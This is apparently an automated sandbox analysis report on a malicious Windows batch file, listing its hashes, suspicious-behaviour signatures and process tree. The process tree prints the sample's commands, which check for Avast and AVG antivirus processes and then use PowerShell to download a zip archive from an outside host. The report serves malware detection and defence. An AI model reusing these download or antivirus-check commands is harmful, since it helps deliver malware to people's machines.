Analysis
-
max time kernel
240s -
max time network
240s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
06112024_0119_new.bat
Resource
win7-20240729-en
General
-
Target
06112024_0119_new.bat
-
Size
44KB
-
MD5
0a8189409a127612b858f940e3410212
-
SHA1
44e4fd543179b18b9565c6ce4145ff61ab75e7f0
-
SHA256
6ef23d5f69695cd8c9381e416928ca10e33a0b927c451399ab439eb64007a5ec
-
SHA512
e4af985ebe31d0beae17999c893c7ad6824684caf863439f676a2dae9b2a6da74eddb41ca58b54aade9fb5ffabe93bd1a2db6ac21fe87f94b5d66c0a354b677d
-
SSDEEP
768:gTYcpQyuPmhDGEhtKC+5Vcc8xJWWAF/U61RPMrQqMgrrLFAvzUk+imrt0wLm2PoL:gTYcpQyuPmhDGEhtKC2Vc93WWApUkPMy
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid Process 2852 powershell.exe 2616 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid Process 940 tasklist.exe 2728 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2852 powershell.exe 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tasklist.exetasklist.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 940 tasklist.exe Token: SeDebugPrivilege 2728 tasklist.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2524 wrote to memory of 940 2524 cmd.exe 30 PID 2524 wrote to memory of 940 2524 cmd.exe 30 PID 2524 wrote to memory of 940 2524 cmd.exe 30 PID 2524 wrote to memory of 788 2524 cmd.exe 31 PID 2524 wrote to memory of 788 2524 cmd.exe 31 PID 2524 wrote to memory of 788 2524 cmd.exe 31 PID 2524 wrote to memory of 2728 2524 cmd.exe 33 PID 2524 wrote to memory of 2728 2524 cmd.exe 33 PID 2524 wrote to memory of 2728 2524 cmd.exe 33 PID 2524 wrote to memory of 2716 2524 cmd.exe 34 PID 2524 wrote to memory of 2716 2524 cmd.exe 34 PID 2524 wrote to memory of 2716 2524 cmd.exe 34 PID 2524 wrote to memory of 2852 2524 cmd.exe 35 PID 2524 wrote to memory of 2852 2524 cmd.exe 35 PID 2524 wrote to memory of 2852 2524 cmd.exe 35 PID 2524 wrote to memory of 2616 2524 cmd.exe 36 PID 2524 wrote to memory of 2616 2524 cmd.exe 36 PID 2524 wrote to memory of 2616 2524 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\06112024_0119_new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:788
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F46WG76FXCRFP4XAWE2S.temp
Filesize7KB
MD5995ee255b880014348fab2b3a67aefb3
SHA10ec507fae0f1e28471e1e59d4f320b78b6549b0e
SHA2569a4ee7ff2a747d75b65b8936d7233814da77c903cac5471963639601bf04ba28
SHA512a8978a30177c0efec7acabd7aa1e164c2b8edf262e92ea0fd8a3013540dd33d99c8a41a4ac5659a743fa56a6c5f1471ec47320e0542c63f843e0a18d490527e3